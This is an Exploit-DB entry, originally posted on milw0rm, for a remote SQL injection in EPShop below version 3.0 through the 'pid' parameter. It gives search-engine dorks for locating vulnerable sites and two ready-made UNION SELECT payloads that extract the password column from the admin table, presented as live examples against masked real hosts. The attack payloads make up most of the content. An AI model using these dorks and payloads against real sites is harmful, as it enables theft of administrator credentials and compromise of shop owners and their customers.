EPShop < 3.0 pid Remote SQL Injection Vulnerability

2008-07-26T00:00:00
ID EDB-ID:6139
Type exploitdb
Reporter mikeX
Modified 2008-07-26T00:00:00

Description

EPShop < 3.0 (pid) Remote SQL Injection Vulnerability. CVE-2008-3412. Webapps exploit for php platform

                                        
                                            ########################################################################################
#
# [+]  Name   : EPShop &lt; 3.0 (pid) Remote SQL Injection Vulnerability
# [+]  Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
# [+]  Dork(s): ?action=pro_show and ?action=disppro
# [+]  Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
#
########################################################################################


Information;

    You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
    They stopped supporting the old version a while ago.

Exploit;

    SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
    SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]

Live Examples;

    http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
    http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--

# milw0rm.com [2008-07-26]